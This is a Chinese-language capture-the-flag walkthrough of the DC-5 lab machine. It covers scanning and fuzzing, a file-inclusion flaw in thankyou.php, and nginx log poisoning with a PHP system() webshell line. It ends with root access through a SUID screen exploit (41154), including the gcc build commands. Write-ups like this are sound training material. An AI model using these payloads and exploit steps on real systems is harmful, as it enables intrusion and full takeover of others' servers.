DC-5

实验环境

攻击者 Kali 192.168.0.103

受害者 DC-5 IP未知

攻击者和受害者在同一网段

 

1. 信息收集

nmap -sn 192.168.192.0/24

受害者IP为192.168.0.105

 

收集受害者服务详情

nmap -sV -A 192.168.0.105

 

 

FUZZ测试

export URL="http://192.168.0.105/FUZZ" 

#模糊测试目录 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "$URL"

#模糊测试文件 排除404网页
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 "$URL"

没有收获

 

nikto扫描

nikto -host=http://192.168.0.105

没有发现

 

2. 漏洞发现和利用

查看http服务

2024-02-28_00-25

经过测试只是普通的静态页面

 

在contact页面里随便输入几个信息 页面跳转到thankyou.php上

2024-02-28_00-26

看下面的Copyright的信息

2024-02-28_00-28

我就刷新了几次 出现了 2017 2018 2019 2020不同的年份 看来thankyou.php里面有隐藏的参数

 

FUZZ找参数

使用burp-parameter-names.txt 字典

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt --hc 404 "$URL"

2024-02-28_00-30

有很多结果 经过测试 851长度的都没用 排除掉851

2024-02-28_00-32

发现了隐藏的参数 看起来是文件包含

我们使用参数尝试一下

http://192.168.0.105/thankyou.php?file=/etc/passwd

使用burpsuite爆破一下目录

payload  /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

2024-02-28_00-41

 

将结果按照长度排序

2024-02-28_00-43

测试一个/var/log/nginx/access.log

2024-02-28_00-43_1

猜想的没错 确实是包含了

 

那就考虑和evilscience一样尝试毒化日志

Evil Science

这一次我们毒化网站日志也就是var/log/nginx/access.log

nc -nv 192.168.0.105 80
GET /<?php echo system($_GET['shell'] );?>   #传输一句话木马

http://192.168.0.105/thankyou.php?file=/var/log/nginx/access.log&shell=id

2024-02-28_01-19

ok 成功

 

试着反弹shell

2024-02-28_01-22

成功返回shell

 

3. 后渗透阶段

查看网络服务

netstat -antlp

2024-02-28_01-40

发现本地监听数据库

 

尝试到/var/www/html寻找关于mysql的线索

grep -Ri 'db'

grep -Ri 'database'

grep -Ri 'sql'

没有发现

 

查看内核和版本信息

www-data@dc-5:/tmp$ uname -a
Linux dc-5 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64 GNU/Linux
www-data@dc-5:/tmp$ cat /etc/*-release
PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
NAME="Debian GNU/Linux"
VERSION_ID="8"
VERSION="8 (jessie)"
ID=debian
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

尝试内核提权 无果

 

查看SUID

find / -user root -perm -4000 2>/dev/null -exec ls -l {} \;

2024-02-28_01-52

这两个可能有问题

先尝试screen

2024-02-28_01-54

 

直接运行是不行的 我们分析一下代码

2024-02-28_02-20

 

由于这个文件是.sh文件 但内容中有c语言的库

如果行首有#那么这一行就会看作为注释

根据第一行 我猜测 下面的c语言代码要单独写一个.c文件 且名字为libhax.c

2024-02-28_02-04

同理 rootshell.c内容在下面

2024-02-28_02-06

在Kali中编辑后传给受害者

ls时发现还有报错

2024-02-28_02-11

少了libhax.so

看完第一个截图后发现做完第一个文件时要gcc一个.so文件  注意修改路径

gcc -fPIC -shared -ldl -o libhax.so libhax.c

 

再次查看截图 最下面还有一个要编译的 

gcc -o rootshell rootshell.c

 

再次ls就不会报错了

2024-02-28_02-14

 

运行41154.sh提权成功

 

 

 

© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片